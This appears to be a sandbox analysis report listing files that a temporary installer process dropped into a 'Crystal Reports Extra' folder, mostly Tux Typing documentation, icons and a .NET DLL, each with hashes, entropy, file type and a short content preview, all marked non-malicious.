                                                          Preview: GNU GENERAL PUBLIC LICENSE....Version 2, June 1991....Copyright (C) 1989, 1991 Free Software Foundation, Inc. 51 Franklin St, Fifth..Floor, Boston, MA 02110-1301 USA Everyone is permitted to copy and distribute..verbatim copies of this license document, but changing it is not allowed.....Preamble....The licenses for most software are designed to take away your freedom to share..and change it. By contrast, the GNU General Public License is intended to..guarantee your freedom to share and change free software--to make sure the..software is free for all its users. This General Public License applies to most..of the Free Software Foundation's software and to any other program whose..authors commit to using it. (Some other Free Software Foundation software is..covered by the GNU Library General Public License instead.) You can apply it to..your programs, too.....When we speak of free software, we are referring to freedom, not price. Our..General Public Licenses are designed to make sure tha
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\Microsoft.ReportViewer.ProcessingObjectModel.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):53248
                                                          Entropy (8bit):4.571289360851901
                                                          Encrypted:false
                                                          SSDEEP:384:Lo5zW/Z0L39rAzRdjfNnCuYE0myI+Stu1OooEoZj1ofV5dkn67vc6ea3bKyEeJPG:LorLSpl2HJ3orWB3F9JUsm/n
                                                          MD5:253BC53169AD46B1EAFB92982BA7268E
                                                          SHA1:3F2F8C6324480B1F39C7BC06B8503FEEDFE5DEF4
                                                          SHA-256:CA513F09B64F8E3DC8EE09663854ADF7E4E84544133D07A3A2EF55701ABFAD4C
                                                          SHA-512:AB6847F2B7E07E85D555B313D63F74D4E74E50EA09EF32FE427822A25ECA12264A49347428D32F42ED65C669C28DAC426310BBD401A21C03177BD9729CFB5E08
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...YA1G...........!......... ........... ........... ....................................@.....................................S.......0............................................................................ ............... ..H............text........ ...................... ..`.rsrc...0...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\dat\PDF_32x32.ico (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:MS Windows icon resource - 9 icons, 48x48, 16 colors, 4 bits/pixel, 32x32, 16 colors, 4 bits/pixel
                                                          Category:dropped
                                                          Size (bytes):25214
                                                          Entropy (8bit):4.039276211338556
                                                          Encrypted:false
                                                          SSDEEP:96:Vlc4sGlhLesCncGE45m8sPaxrOSzv1H29K1KgoJC+t6szu0NO0IPENMx9x4alGJa:DtrJZ6serDeJqMUf4JkYl6
                                                          MD5:0BF18ABDC53FC1AE4DB2545ABBB486FA
                                                          SHA1:A333D0AEB07C3996E65BB9DC0682415026131F99
                                                          SHA-256:D85FEE8448F26FC990D3C54CAED42CFFB98C06109F2D55F645FD0490E0DC25BA
                                                          SHA-512:AD8B1D960236A41290BE9A063B8FF1E2174DD1659C96B2A1712F8CEC39C28E073DE50AA1A087800FA7830796B42BC64CBD537354C33DE42D0151AB61B8237BE1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ......00......h....... ......................(.......00.............. ......................h...^"..00.... ..%...'.. .... .....nM........ .h....^..(...0...`......................................................................................................wwwwwwwwwwwwwwwww.......wG7g.swRu7ewCv.aw.......................7.......................w.........x..x.x..w.....G.........w.tw.px.Sx.RW.7.......v...x7.xw..'.w..w.......sww..G..G..W.xx..........xw.x7.x7.x.....g........7...W.qx..x..x.w........u...7....w.............................g........a...w..........w..............................................g..............................................w.......................w...............................................w.......................w...............................................g.......................w...............................................w.......................g.......................w...............................................g......wwwwwwwww.ww.....w..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\dat\enc.ico (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:MS Windows icon resource - 9 icons, 48x48, 16 colors, 4 bits/pixel, 32x32, 16 colors, 4 bits/pixel
                                                          Category:dropped
                                                          Size (bytes):25214
                                                          Entropy (8bit):3.9681804468286277
                                                          Encrypted:false
                                                          SSDEEP:192:FzvfVE74IjYKZ4FQfJ43urjtpQqP7xTTqWV:hC4IjYKZ4Fs7rjtpQa3
                                                          MD5:E149094555DD89FE88D8836A51090DE6
                                                          SHA1:EECE6539C9FAD65B0DAC035AEF6B9920866941B0
                                                          SHA-256:7D6206D8F7DA57BC2E4A69804CC5796A146AF98C920BB6801BBEBE4335B09E32
                                                          SHA-512:58524DAB052147CA5162F0992ED030FEC1203726DB1634FAFB0B92802787374EFCD0F5E4D2F20DD7A58C38F49D01A98E9C00FDA03E6370BA73F83A922BB54F14
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ......00......h....... ......................(.......00.............. ......................h...^"..00.... ..%...'.. .... .....nM........ .h....^..(...0...`......................................................................................................wwwwwwwwwwwwwwwww.......xwwwwwwwwwwww.wxw.........@...@....@....w.......................w.......................w...............................................w........~......~.......w.....................w............................................w........~.............w.......................w.......................w......................w...............................~..............w.......................w.......................w.......................w.......................w...............................................w.......................w.......................w.......................w.......................w.......................w.......................w..............................wwwwxwwwwwxw.....w..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\dat\ico48.ico (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:MS Windows icon resource - 3 icons, 48x48, 16 colors, 4 bits/pixel, 48x48, 8 bits/pixel
                                                          Category:dropped
                                                          Size (bytes):15086
                                                          Entropy (8bit):5.750409332348987
                                                          Encrypted:false
                                                          SSDEEP:96:VFv6swSQHlNxbFlswv1EhGRjI5iMGgqexHw3eugeEeNesDeP4eTe02eVtVe7eEDu:tOzVFlssuIlvMvQwXeuD0Udl47m6zk
                                                          MD5:423CA0B47B073150089226A3E616702E
                                                          SHA1:62C33784525890C31C6AC65E29D22E4D304025B3
                                                          SHA-256:1732898BCCE38FC7724677F884C7643BBA1CA690302831557A134E18035C4718
                                                          SHA-512:A9E94F8F9376DC3D736D9AB458A2F3DCBC753311849B69A927ABA969874A2B4CC78648247D4D44B407140FB884BDE69F3DFEE6B6AC0622B4C949B85642E59416
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ......00......h...6...00..............00.... ..%..F...(...0...`........................................................................................................................wwwwwwwwwwwwwwwwwwwwww...wGf|gVvvtwgegegggggg.p.~f..gf.f~^f.~.nv..v.v.p.lxh~.......~.....w.h.p.h....~.x..w.~~..~.p..~...~..lw.l~~~..~...p.h.h.~x..............p.f~.x.........N..h..p.h...g..........n..~x.p.l........vVGg.....~...p.h~~~x...d|G.G...~...p.|....l|fvtvV....xg..p.n~....|gGD.LlfV...n..p.g.....Gdl....GgG....~.p.l.h...|e......Lv.....p.v....teh......vdw.....p.n.....l...fW...|d..~|.p.|~x..lg..ltv...FV....p.h...vGH..VG.V..Glx..~.p.|~..|v...g.Gd..leh....p.g..dt..vGF|gGlvV....p.^w..V...G.|el|V|dg..~.p.n~...d..FGFVGfFGG.....p.|...d|..vV.lv.g.dv....p.g..GF....dteg.V.....P..~..lg..vVV.ddefVW..~.p.g....Fx..fGd|x.V.h....p.|...vV...tt|v..dg....p.g....fW.....H...F..~x.p.h....el...wH...Vl.....p.n~...Lth......G.X...x.p.hh....gFx.....vG...h.p.l.x...|v.x...g.F...x.p.h....td|GlvVVF...v...p.g
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\dat\is-5TG90.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:MS Windows icon resource - 9 icons, 48x48, 16 colors, 4 bits/pixel, 32x32, 16 colors, 4 bits/pixel
                                                          Category:dropped
                                                          Size (bytes):25214
                                                          Entropy (8bit):4.039276211338556
                                                          Encrypted:false
                                                          SSDEEP:96:Vlc4sGlhLesCncGE45m8sPaxrOSzv1H29K1KgoJC+t6szu0NO0IPENMx9x4alGJa:DtrJZ6serDeJqMUf4JkYl6
                                                          MD5:0BF18ABDC53FC1AE4DB2545ABBB486FA
                                                          SHA1:A333D0AEB07C3996E65BB9DC0682415026131F99
                                                          SHA-256:D85FEE8448F26FC990D3C54CAED42CFFB98C06109F2D55F645FD0490E0DC25BA
                                                          SHA-512:AD8B1D960236A41290BE9A063B8FF1E2174DD1659C96B2A1712F8CEC39C28E073DE50AA1A087800FA7830796B42BC64CBD537354C33DE42D0151AB61B8237BE1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ......00......h....... ......................(.......00.............. ......................h...^"..00.... ..%...'.. .... .....nM........ .h....^..(...0...`......................................................................................................wwwwwwwwwwwwwwwww.......wG7g.swRu7ewCv.aw.......................7.......................w.........x..x.x..w.....G.........w.tw.px.Sx.RW.7.......v...x7.xw..'.w..w.......sww..G..G..W.xx..........xw.x7.x7.x.....g........7...W.qx..x..x.w........u...7....w.............................g........a...w..........w..............................................g..............................................w.......................w...............................................w.......................w...............................................g.......................w...............................................w.......................g.......................w...............................................g......wwwwwwwww.ww.....w..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\dat\is-60EIS.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:MS Windows icon resource - 9 icons, 48x48, 16 colors, 4 bits/pixel, 32x32, 16 colors, 4 bits/pixel
                                                          Category:dropped
                                                          Size (bytes):25214
                                                          Entropy (8bit):3.9681804468286277
                                                          Encrypted:false
                                                          SSDEEP:192:FzvfVE74IjYKZ4FQfJ43urjtpQqP7xTTqWV:hC4IjYKZ4Fs7rjtpQa3
                                                          MD5:E149094555DD89FE88D8836A51090DE6
                                                          SHA1:EECE6539C9FAD65B0DAC035AEF6B9920866941B0
                                                          SHA-256:7D6206D8F7DA57BC2E4A69804CC5796A146AF98C920BB6801BBEBE4335B09E32
                                                          SHA-512:58524DAB052147CA5162F0992ED030FEC1203726DB1634FAFB0B92802787374EFCD0F5E4D2F20DD7A58C38F49D01A98E9C00FDA03E6370BA73F83A922BB54F14
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ......00......h....... ......................(.......00.............. ......................h...^"..00.... ..%...'.. .... .....nM........ .h....^..(...0...`......................................................................................................wwwwwwwwwwwwwwwww.......xwwwwwwwwwwww.wxw.........@...@....@....w.......................w.......................w...............................................w........~......~.......w.....................w............................................w........~.............w.......................w.......................w......................w...............................~..............w.......................w.......................w.......................w.......................w...............................................w.......................w.......................w.......................w.......................w.......................w.......................w..............................wwwwxwwwwwxw.....w..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\dat\is-NE78S.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:MS Windows icon resource - 3 icons, 48x48, 16 colors, 4 bits/pixel, 48x48, 8 bits/pixel
                                                          Category:dropped
                                                          Size (bytes):15086
                                                          Entropy (8bit):5.750409332348987
                                                          Encrypted:false
                                                          SSDEEP:96:VFv6swSQHlNxbFlswv1EhGRjI5iMGgqexHw3eugeEeNesDeP4eTe02eVtVe7eEDu:tOzVFlssuIlvMvQwXeuD0Udl47m6zk
                                                          MD5:423CA0B47B073150089226A3E616702E
                                                          SHA1:62C33784525890C31C6AC65E29D22E4D304025B3
                                                          SHA-256:1732898BCCE38FC7724677F884C7643BBA1CA690302831557A134E18035C4718
                                                          SHA-512:A9E94F8F9376DC3D736D9AB458A2F3DCBC753311849B69A927ABA969874A2B4CC78648247D4D44B407140FB884BDE69F3DFEE6B6AC0622B4C949B85642E59416
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ......00......h...6...00..............00.... ..%..F...(...0...`........................................................................................................................wwwwwwwwwwwwwwwwwwwwww...wGf|gVvvtwgegegggggg.p.~f..gf.f~^f.~.nv..v.v.p.lxh~.......~.....w.h.p.h....~.x..w.~~..~.p..~...~..lw.l~~~..~...p.h.h.~x..............p.f~.x.........N..h..p.h...g..........n..~x.p.l........vVGg.....~...p.h~~~x...d|G.G...~...p.|....l|fvtvV....xg..p.n~....|gGD.LlfV...n..p.g.....Gdl....GgG....~.p.l.h...|e......Lv.....p.v....teh......vdw.....p.n.....l...fW...|d..~|.p.|~x..lg..ltv...FV....p.h...vGH..VG.V..Glx..~.p.|~..|v...g.Gd..leh....p.g..dt..vGF|gGlvV....p.^w..V...G.|el|V|dg..~.p.n~...d..FGFVGfFGG.....p.|...d|..vV.lv.g.dv....p.g..GF....dteg.V.....P..~..lg..vVV.ddefVW..~.p.g....Fx..fGd|x.V.h....p.|...vV...tt|v..dg....p.g....fW.....H...F..~x.p.h....el...wH...Vl.....p.n~...Lth......G.X...x.p.hh....gFx.....vG...h.p.l.x...|v.x...g.F...x.p.h....td|GlvVVF...v...p.g
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\ABOUT-NLS (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):76502
                                                          Entropy (8bit):2.4185965872860735
                                                          Encrypted:false
                                                          SSDEEP:384:cvXuypQc+jWYla0GOtQBknkYVM/kLR78k/RPfkRr06uUxKQH6k+9i:c2aEWyZztmknkeM/kd78k5Pfk086kl
                                                          MD5:B5A080B27B5B4C1A160D2BED1FCFAF9F
                                                          SHA1:B50287B75A3B098301455E34C8D8E52A09FA8938
                                                          SHA-256:4C825530CA79E944B63C56ED30BE58EF792B4ADAB6F7F38ABAB8C054432F4A86
                                                          SHA-512:4EFCE9472E21B052B8FE8113DD3B5480586C06CD27C8535712B10BAE2F7E32F33530A9E8C8DA6F6D8FEAD682EE556EAEC0CDA2525CE9121EC95B6E25F3075696
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: 1 Notes on the Free Translation Project.***************************************..Free software is going international! The Free Translation Project is.a way to get maintainers of free software, translators, and users all.together, so that free software will gradually become able to speak many.languages. A few packages already provide translations for their.messages... If you found this `ABOUT-NLS' file inside a distribution, you may.assume that the distributed package does use GNU `gettext' internally,.itself available at your nearest GNU archive site. But you do _not_.need to install GNU `gettext' prior to configuring, installing or using.this package with messages translated... Installers will find here some useful hints. These notes also.explain how users should proceed for getting the programs to use the.available translations. They tell how people wanting to contribute and.work on translations can contact the appropriate team... When reporting bugs in the `intl/' direct
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\AUTHORS (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):4390
                                                          Entropy (8bit):5.0878631480288785
                                                          Encrypted:false
                                                          SSDEEP:48:bGKA1YUK6lqGCNsdksZXnA2TZUIZABZpA5DtDVr36ko18dpeQqCvQ48SN7N3kPCz:KKA1HCNsdk5QpvRqCvaw1kPC3flcL+
                                                          MD5:4B8E4F960D80B0458ACBEEA70D025895
                                                          SHA1:8222D99B7F2CC775471BF0B55502627A457202B5
                                                          SHA-256:37D3194DBD584985C5544E805E293C3F2A8833D7CCAF0935AC8678895665DCB3
                                                          SHA-512:E7CCBDFD356A67B757C7B119189AC2C5A4707017AFA589644C9B43EBD72640C73182353EEE74267F9CDB7C66C59EB4FC0E821147A34E16EEE0A347106B915C80
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Tux Typing Original Author:.----------.Sam Hart <hart@geekcomix.com>..Current Maintainer and Lead Coder:.-------.David Bruce <davidstuartbruce@gmail.com>..Coders:.-------.David Bruce <davidstuartbruce@gmail.com>.Jesse Andrews <jdandr2@uky.edu>.Calvin Arndt <calarndt@tux4kids.org>.Sam Hart <hart@geekcomix.com>.Jacob Greig <bombastic@firstlinux.net>.Sreyas Kurumanghat.<k.sreyas@gmail.com>.Sreerenj Balachandran <bsreerenj@gmail.com>.Vimal Ravi <vimal_ravi@rediff.com>.Prince K. Antony <prince.kantony@gmail.com>.Mobin Mohan <mobinmohan@gmail.com>.Matthew Trey <tux4kids@treyhome.com>.Sarah Frisk <ssfrisk@gmail.com>..Packaging & Ports:.------------------.Holger Levsen <holger@debian.org> - (Debian packager).David Bruce <davidstuartbruce@gmail.com> - (Windows crossbuild using Linux host, OpenSUSE Build Service rpm packages, MacPorts build).Alex Shorthouse <ashorthouse@rsd13.org> - (more recent Mac OSX port).Luc Shrivers <Begasus@skynet.be> - (BeOS/Haiku port)..(previous packagers:).David Mar
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\COPYING (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):15131
                                                          Entropy (8bit):4.682434970392502
                                                          Encrypted:false
                                                          SSDEEP:384:AEUwi5rRL67cyV12rPd34FomzM2/R+qWG:A7FCExGFzeqt
                                                          MD5:CBBD794E2A0A289B9DFCC9F513D1996E
                                                          SHA1:2D29C273FDA30310211BBF6A24127D589BE09B6C
                                                          SHA-256:67F82E045CF7ACFEF853EA0F426575A8359161A0A325E19F02B529A87C4B6C34
                                                          SHA-512:C1D6AA39A08542C0C92057946FA1E6A65759575DE1C446B0D11CDF922B2F41EB088B7DC007CD3858FF4AC8C22D6F02E4FAA94FF6A697064613F073C432FB1EF1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: .. GNU GENERAL PUBLIC LICENSE... Version 2, June 1991.. Copyright (C) 1989, 1991 Free Software Foundation, Inc.. 675 Mass Ave, Cambridge, MA 02139, USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...... Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.License is intended to guarantee your freedom to share and change free.software--to make sure the software is free for all its users. This.General Public License applies to most of the Free Software.Foundation's software and to any other program whose authors commit to.using it. (Some other Free Software Foundation software is covered by.the GNU Library General Public License instead.) You can apply it to.your programs, too... When we speak of free software, we are referring to freedom, not.price. Our General Public Licenses are de
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\ChangeLog (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):29717
                                                          Entropy (8bit):4.7846516544735325
                                                          Encrypted:false
                                                          SSDEEP:384:smHYO2QyLSEN5KmtCVtaMmy8dnMQxWMW0bbyyuE1T0+bTh1qWBHXYzI1W5L4V8Gd:1aQHej26aWvm6cC0WFmPY
                                                          MD5:DD4E1B9708EF55F30D06198198AD2B03
                                                          SHA1:34092F4338FD69E66F8C4525201BCF760FD55019
                                                          SHA-256:07DEC805477121755D2C4309547017BBF6AE4A439C8D3925B7D928CAB2FFEEA7
                                                          SHA-512:71A3423F3F68B99ECBAD311C00BBD00D9806037D71DDC5378D91D6E01EE64EF44DA8569DA027498D4F94CD0293C5DD504A042B64DEDF875DF92D9D96CE450352
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: 04 Apr 2010 (git.debian.org/tux4kids/tuxtype.git - tag = "version-1.8.1".[ David Bruce <davidstuartbruce@gmail.com> ].Version 1.8.1..- Several minor enhancements - git commit messages now serving as..primary documentation of development, rather than this changelog...- Fish cascade backgrounds now selected randomly...- Fish cascade graphics now use true alpha channel rather than SDL..colorkey...- Some fixes related to file location of custom word lists...09 Nov 2009 (svn.debian.org/tux4kids - revision 1640) .[ David Bruce <davidstuartbruce@gmail.com> ].Version 1.8.0. - Sarah Frisk's word list editor from GSoC 2009 has been merged in as. a new, somewhat "beta" feature...12 Sep 2009 (svn.debian.org/tux4kids - revision 1532) .[ David Bruce <davidstuartbruce@gmail.com> ]. - Media - new music files and backgrounds contributed by Caroline Ford,. some old sounds (the ones with suboptimal free licensing) removed - Tux. Typing is now 100% DFSG-compliant. Re
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\INSTALL (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):10644
                                                          Entropy (8bit):4.801280319778263
                                                          Encrypted:false
                                                          SSDEEP:192:ZwDpWkkNH3WhWdWjPpAcWaprsKtFd2W7688zIOKBRqB:ZwDpWkCXWhWdWbp7WapTtyW7n0oRqB
                                                          MD5:8FB227C6E1B6375D0AFD0DEED289E0B4
                                                          SHA1:8C30D1E996821D2BA9E84E86214F24CBC094A005
                                                          SHA-256:C4ADD274C0889E61F7F6B591C601842F9F9C3E7C17D36E4374AFEF4E1F899A50
                                                          SHA-512:6BC7638BE91AFD98E0DC37B91007C1997B32CAFDFF524A6B4C06BC5DD61E28E9D184A2B662DBF55765F88CA3BB2DF3C7EBB00CA6287A011001C2D1AF1FA279AF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Tux Typing 1.8.1.04 Apr 2010..NOTE - this document is reasonably correct but not completely current..It will updated as the maintainer's time allows. For GNU/Linux users, you.need the "*dev" files for the SDL libs listed below, and should have the.dev file for SDL_Pango if you want to display non-Western text. TuxType.will build successfully, but without SDL_Pango support, if this header/lib.is not found...Most GNU/Linux users can install Tux Typing with their distribution's .package manager (such as apt or yum). To build from source, you can grab.the tuxtype_w_fonts*tar.gz, untar it, and build with "./configure; make;.make install". You do not need Autotools unless you are building from.a Subversion repository checkout. MacOSX users and Windows users can.install with very user-friendly binary installer packages - DSB...The current web site is http://www.tux4kids.com..The developer mailing list is tux4kids-tuxtype-dev@lists.alioth.debian.org..Feel free to email with any feedback or
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\OFL (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):4599
                                                          Entropy (8bit):4.991877820151237
                                                          Encrypted:false
                                                          SSDEEP:96:rmgAmgnPUibMxxUDfGkKnjfRU88f+BktjVKvR1wyQeQHDZoN:yiXsMPZW88f+XvR9QHtE
                                                          MD5:969851E3A70122069A4D9EE61DD5A2ED
                                                          SHA1:C450C836DB375B12AB7A4C10B09375513D905A68
                                                          SHA-256:CE243FD4A62B1B76C959FFBA6EC16A7A3146B2362D441AE4F9F7F32FC3750D6C
                                                          SHA-512:54B335554F88E01EF0B07ED5F20C7FBC86EDE2E6395BA53AFC7B5DDF8C7DA728309A70E178ACD5AA8AFD16BCDF64527A1ACBB54D51D693A2966D34218F963DCE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Copyright (c) <dates>, <Copyright Holder> (<URL|email>),.with Reserved Font Name <Reserved Font Name>..Copyright (c) <dates>, <additional Copyright Holder> (<URL|email>),.with Reserved Font Name <additional Reserved Font Name>..Copyright (c) <dates>, <additional Copyright Holder> (<URL|email>)...This Font Software is licensed under the SIL Open Font License, Version 1.1..This license is copied below, and is also available with a FAQ at:.http://scripts.sil.org/OFL...-----------------------------------------------------------.SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007.-----------------------------------------------------------..PREAMBLE.The goals of the Open Font License (OFL) are to stimulate worldwide.development of collaborative font projects, to support the font creation.efforts of academic and linguistic communities, and to provide a free and.open framework in which fonts may be shared and improved in partnership.with others...The OFL allows the licensed fonts to be used,
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\README (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):3612
                                                          Entropy (8bit):4.707814791494116
                                                          Encrypted:false
                                                          SSDEEP:96:PxyP+cp7u0m7yLhA5hnmQi+8Eea67yrzb4GeC3xLGRLyynj:Pwmw7uh95fiEeVOP41EEyo
                                                          MD5:F5E6311A96B7BD0715FFDD86CF1E1553
                                                          SHA1:BB80358A88F84F8E6A310D9920B92D8F30FF4C14
                                                          SHA-256:F5259F91C0D622D456FA99BE940184BD1EEB8EBD9D4EC28B44669BDD98176B45
                                                          SHA-512:2ED6167B6227A83DC361B175E7ACB0FB23B126E782153B76758D54748AC396D0C19BC6E54E1659A6F4F6B5AE36891EBFAE075D8BBC8C992FAA01388F990D096B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: NOTE - this document is reasonably correct but not completely current..It will updated as the maintainer's time allows - DSB...Tux Typing:.An Educational Typing Tutor Game Starring Tux, the Linux Penguin.----------------------------------------------------------------..(To install the game on your system, please read the INSTALL file.).. If you are interested in Translation/moving this game to another . language, please send a mail to .. David Bruce <davidstuartbruce@gmail.com>, . Holger Levsen <debian@layer-acht.org>, or to:.. <tux4kids-tuxtype-dev@lists.alioth.debian.org>.. Additional information on this subject is covered in "HowToTheme.html". in the "doc/en" directory of this package...(Updated 04 Apr 2010)..This is version 1.8.1 of Tux Typing...In Fish Cascade you control Tux as he searches for fish to eat. Fish fall.from the top of the screen. These fish have letters on them. Unforunately.for Tux, eating a fish with a letter on it will cause his stomach to.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\TODO (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):1043
                                                          Entropy (8bit):4.6860266698980135
                                                          Encrypted:false
                                                          SSDEEP:24:NPVQRBFhBOKsV1+BBMKXOweWYK8dcxTJtXiwyfhpk:NuhBOKM1+BBMKdeLaJRr
                                                          MD5:4D1B4BFAD0C4D377505C3C14B7B60EBB
                                                          SHA1:07CBB76C647E8334506D1D63855689D4D001C4E2
                                                          SHA-256:D00691DE52A7961695100061C9717E57CFFAA2D390A9A25311FB6775122830D5
                                                          SHA-512:83D9BD9811EDFF42ACC72AEDB6DF95C28ABFFC197CC9521F3B3B62CD03B9A577F63E537FD8A6D941E61E6E24C6BE00977B3C98DC6608DBDF302ED6C28AE24449
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Updated 04 Apr 2010..Briefly, here are some current issues:..Tuxtype:..- Code: still needs a lot of cleanup. Tuxtype could benefit markedly from the reorganization using libt4k-common...- Build: mingw-cross-env crossbuild not ready for general consumption....- SDL_mixer 1.2.11 exits unexpectedly on initial call to Mix_OpenAudio(), reason not yet clear....- SDL_Pango builds successfully, but resultant program does not display any text when run under Windows....- If SDL_Pango disabled, configure script fails to link to SDL_ttf...- Build: need current binary build for Mac OS-X..- Input methods: tuxtype does not correctly handle keyboard input that uses more than one keypress for each character (such as Asian languages). The input methods code from tuxpaint has been added to the source tree, but is not yet actually used...- "Content" - could use better lessons to actually teach touch typing in a systematic fashion...- Should display lesson names rather than simply file names, and would b
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\TuxType_port_Mac.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with very long lines
                                                          Category:dropped
                                                          Size (bytes):4056
                                                          Entropy (8bit):4.947683257149111
                                                          Encrypted:false
                                                          SSDEEP:96:88AMGX2Jjro4obNTSdO7BUz6pZRgrKGTg:tApGJHoZtSw7arTTg
                                                          MD5:12CD9A17B7741CB9989FEA8AEBF82C6F
                                                          SHA1:B321C8B0122548853C9FCEDE1DCA4640C13711DD
                                                          SHA-256:685964CBDA0311A79D10B315C503B15A7CE3EF9EC60C62AD8CE73DBA21A5986B
                                                          SHA-512:488C19FE3D911FA5A8EC15E3712550BD1F6A2F3BEAF0A98E4432F86C77B891E044E724426F322FCA70B4D88E929F094454FCF890D2EEEC25B209447B95193FE1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: How I Ported Tuxtype to Mac OS X:..**Note** I am writing this from memory. These steps should work, but if they do not, contact the tuxtype developer team and search google for answers. That is how I was able to port Tuxtype...**Note** My tuxtye.xcodeproj should exist in the Tuxtype SVN. Open that to see my settings for the project...Requirements: .1. Mac OS 10.4 or higher (10.3, SDL, and Quicktime causes an error, so use 10.4).2. Xcode 2.5 [a free download from Apple's website] (or Xcode 3 should work but has not been tested)...Steps to get Tuxtype working on a Mac:..1. Download the following source codes:. a. SDL (I used version 1.2.12) [http://www.libsdl.org/download-1.2.php]. b. SDL_image (I used version 1.2.6) [http://www.libsdl.org/projects/SDL_image/]. c. SDL_mixer (I used version 1.2.8) [http://www.libsdl.org/projects/SDL_mixer/]. d. SDL_ttf (I used version 2.0.9) [http://www.libsdl.org/projects/SDL_ttf/]..2. Once you have SDL, open the SDL direct
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\howtotheme.html (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:HTML document, ASCII text, with very long lines
                                                          Category:dropped
                                                          Size (bytes):12081
                                                          Entropy (8bit):4.803085884480498
                                                          Encrypted:false
                                                          SSDEEP:192:GJJ6dzAFbjDECAUYMfPCpBjUipqr6n1LcVm+QdmG/x1L5/lNGI7:e6dzAN3/fCnpK6nlc0+gbF7
                                                          MD5:4C5FDDC1BE71C19D6E1AE718916F5878
                                                          SHA1:4F8DF91EBF3DF62F98B4FC92836D1CB36A986DE5
                                                          SHA-256:83BB9EA4E0E5609A959E8ED34D56AB6DD7CBA40D449EC22077ABFD2173A22ED8
